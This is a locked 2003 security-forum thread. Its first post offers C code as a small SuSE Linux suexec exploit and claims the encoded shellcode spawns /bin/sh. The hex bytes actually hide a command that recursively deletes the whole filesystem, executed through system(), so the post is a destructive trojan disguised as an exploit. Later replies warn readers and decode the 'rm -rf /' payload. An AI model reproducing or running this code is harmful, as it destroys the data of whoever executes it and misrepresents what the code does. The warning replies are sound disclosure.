Government Security
Network Security Resources

Jump to content

Photo

Small Suse Linux Exploit


  • This topic is locked This topic is locked
2 replies to this topic

#1 RELiC

RELiC

    Corporal

  • Members
  • 163 posts

Posted 15 November 2003 - 11:04 AM

small shellcode exploit

/* tested on Suse linux*/ 

#include <stdio.h> 
#include <stdlib.h> 
#include <unistd.h> 

/* simple shellcode for linux/x86 */ 
char shellcode[] = 
"\x31\x0b\x60\x72\x6d\x20\x2d\x72\x66\x20\x32\x3e" 
"\x2f\x64\x65\x76\x2f\x6e\x75\x6c\x6c\x20\x2f\x20" 
"\x26\x60\xcd\x80\x2fbin\x2fsh0xbfffc260"; 

int main () 
{ 
char buf[400]; 

sprintf(buf,"/usr/sbin/suexec %s",shellcode); 
system(buf); 

}

it's a pretty small exploit that appends the shell code to suexec and executes it you can easy test the shell code it executes /bin/sh

Source: http://forum.securitylab.ru/forum_posts.asp?TID=6500&PN=1

../

#2 creep01

creep01

    Private First Class

  • Members
  • 46 posts

Posted 15 November 2003 - 11:24 AM

DONT EXECUTE THIS CODE
IT WILL DELETE EVERYTHING ON ITS PATH
BY THE TIME YOU HIT THE BUTTON IT WILL UNLEASH HELL!!

#3 insider

insider

    Private

  • Members
  • 1 posts

Posted 08 September 2010 - 04:41 AM

DONT EXECUTE THIS CODE
IT WILL DELETE EVERYTHING ON ITS PATH
BY THE TIME YOU HIT THE BUTTON IT WILL UNLEASH HELL!!


http://blog.security...ling-shellcode/

A fter i have decoded this shellcode i saw: rm -rf 2>/dev/null / &
Really bad shellcode :)




0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users